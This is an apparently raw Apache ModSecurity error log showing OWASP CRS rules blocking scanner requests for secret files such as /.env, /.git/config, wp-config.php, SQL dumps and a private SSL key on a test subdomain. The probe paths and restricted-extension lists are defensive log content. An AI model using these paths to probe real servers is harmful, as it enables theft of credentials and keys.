[Sun Mar 16 19:07:53.230380 2025] [:error] [pid 1825648] [client 209.38.208.202:38668] [client 209.38.208.202] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9cTecjbUq1VeupLM1E9RQAAAAU"]
[Sun Mar 16 19:07:53.230876 2025] [:error] [pid 1825648] [client 209.38.208.202:38668] [client 209.38.208.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9cTecjbUq1VeupLM1E9RQAAAAU"]
[Sun Mar 16 19:07:53.231238 2025] [:error] [pid 1825648] [client 209.38.208.202:38668] [client 209.38.208.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9cTecjbUq1VeupLM1E9RQAAAAU"]
[Sun Mar 16 19:07:53.408986 2025] [:error] [pid 1825653] [client 209.38.208.202:38680] [client 209.38.208.202] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9cTefIrwL6lrFR40Vx5GAAAAAk"]
[Sun Mar 16 19:07:53.409837 2025] [:error] [pid 1825653] [client 209.38.208.202:38680] [client 209.38.208.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9cTefIrwL6lrFR40Vx5GAAAAAk"]
[Sun Mar 16 19:07:53.410387 2025] [:error] [pid 1825653] [client 209.38.208.202:38680] [client 209.38.208.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z9cTefIrwL6lrFR40Vx5GAAAAAk"]
[Sun Mar 16 22:10:46.844250 2025] [:error] [pid 1825902] [client 213.232.87.228:43193] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database_backup.sql"] [unique_id "Z9c-Vj0V0rDSN-ZBfYo9QAAAAAo"]
[Sun Mar 16 22:10:46.846354 2025] [:error] [pid 1825883] [client 213.232.87.228:6053] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Z9c-Vop7diytsfYOYbHFwwAAAAA"]
[Sun Mar 16 22:10:46.847066 2025] [:error] [pid 1825883] [client 213.232.87.228:6053] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Z9c-Vop7diytsfYOYbHFwwAAAAA"]
[Sun Mar 16 22:10:46.847485 2025] [:error] [pid 1825883] [client 213.232.87.228:6053] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Z9c-Vop7diytsfYOYbHFwwAAAAA"]
[Sun Mar 16 22:10:46.854301 2025] [authz_core:error] [pid 1825671] [client 213.232.87.228:56755] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Mar 16 22:10:46.857728 2025] [:error] [pid 1825902] [client 213.232.87.228:43193] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database_backup.sql"] [unique_id "Z9c-Vj0V0rDSN-ZBfYo9QAAAAAo"]
[Sun Mar 16 22:10:46.857909 2025] [:error] [pid 1825902] [client 213.232.87.228:43193] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database_backup.sql"] [unique_id "Z9c-Vj0V0rDSN-ZBfYo9QAAAAAo"]
[Sun Mar 16 22:10:46.875117 2025] [:error] [pid 1825864] [client 213.232.87.228:32911] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z9c-Vhv0BTBfu7FAinEyaQAAAAU"]
[Sun Mar 16 22:10:46.875283 2025] [:error] [pid 1825864] [client 213.232.87.228:32911] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z9c-Vhv0BTBfu7FAinEyaQAAAAU"]
[Sun Mar 16 22:10:46.875447 2025] [:error] [pid 1825864] [client 213.232.87.228:32911] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z9c-Vhv0BTBfu7FAinEyaQAAAAU"]
[Sun Mar 16 22:10:47.226743 2025] [:error] [pid 1825671] [client 213.232.87.228:30935] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z9c-VwCK-9_3YmSrShN86gAAAAI"]
[Sun Mar 16 22:10:47.226897 2025] [:error] [pid 1825671] [client 213.232.87.228:30935] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z9c-VwCK-9_3YmSrShN86gAAAAI"]
[Sun Mar 16 22:10:47.227104 2025] [:error] [pid 1825671] [client 213.232.87.228:30935] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z9c-VwCK-9_3YmSrShN86gAAAAI"]
[Sun Mar 16 22:10:47.227284 2025] [:error] [pid 1825671] [client 213.232.87.228:30935] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "Z9c-VwCK-9_3YmSrShN86gAAAAI"]
[Sun Mar 16 22:10:47.231003 2025] [:error] [pid 1825902] [client 213.232.87.228:56867] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z9c-Vz0V0rDSN-ZBfYo9QQAAAAo"]
[Sun Mar 16 22:10:47.231164 2025] [:error] [pid 1825902] [client 213.232.87.228:56867] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z9c-Vz0V0rDSN-ZBfYo9QQAAAAo"]
[Sun Mar 16 22:10:47.231306 2025] [:error] [pid 1825902] [client 213.232.87.228:56867] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z9c-Vz0V0rDSN-ZBfYo9QQAAAAo"]
[Sun Mar 16 22:10:47.319680 2025] [:error] [pid 1825650] [client 213.232.87.228:49695] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z9c-Vw-ZARtfKZhjYYBg-wAAAAc"]
[Sun Mar 16 22:10:47.319996 2025] [:error] [pid 1825650] [client 213.232.87.228:49695] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z9c-Vw-ZARtfKZhjYYBg-wAAAAc"]
[Sun Mar 16 22:10:47.320180 2025] [:error] [pid 1825650] [client 213.232.87.228:49695] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z9c-Vw-ZARtfKZhjYYBg-wAAAAc"]
[Sun Mar 16 22:10:47.322197 2025] [:error] [pid 1825901] [client 213.232.87.228:31631] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Z9c-V1td0ELtN3N5taKcmwAAAAk"]
[Sun Mar 16 22:10:47.322499 2025] [:error] [pid 1825901] [client 213.232.87.228:31631] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Z9c-V1td0ELtN3N5taKcmwAAAAk"]
[Sun Mar 16 22:10:47.322653 2025] [:error] [pid 1825901] [client 213.232.87.228:31631] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Z9c-V1td0ELtN3N5taKcmwAAAAk"]
[Sun Mar 16 22:10:47.324836 2025] [:error] [pid 1825873] [client 213.232.87.228:50019] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z9c-V5xxtw0DaQ3RA7J_7wAAABM"]
[Sun Mar 16 22:10:47.325079 2025] [:error] [pid 1825873] [client 213.232.87.228:50019] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z9c-V5xxtw0DaQ3RA7J_7wAAABM"]
[Sun Mar 16 22:10:47.325230 2025] [:error] [pid 1825873] [client 213.232.87.228:50019] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z9c-V5xxtw0DaQ3RA7J_7wAAABM"]
[Sun Mar 16 22:10:47.534840 2025] [:error] [pid 1825671] [client 213.232.87.228:37503] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9c-VwCK-9_3YmSrShN86wAAAAI"]
[Sun Mar 16 22:10:47.535291 2025] [:error] [pid 1825671] [client 213.232.87.228:37503] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9c-VwCK-9_3YmSrShN86wAAAAI"]
[Sun Mar 16 22:10:47.535762 2025] [:error] [pid 1825671] [client 213.232.87.228:37503] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z9c-VwCK-9_3YmSrShN86wAAAAI"]
[Sun Mar 16 22:10:47.576488 2025] [:error] [pid 1825901] [client 213.232.87.228:53567] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z9c-V1td0ELtN3N5taKcnAAAAAk"]
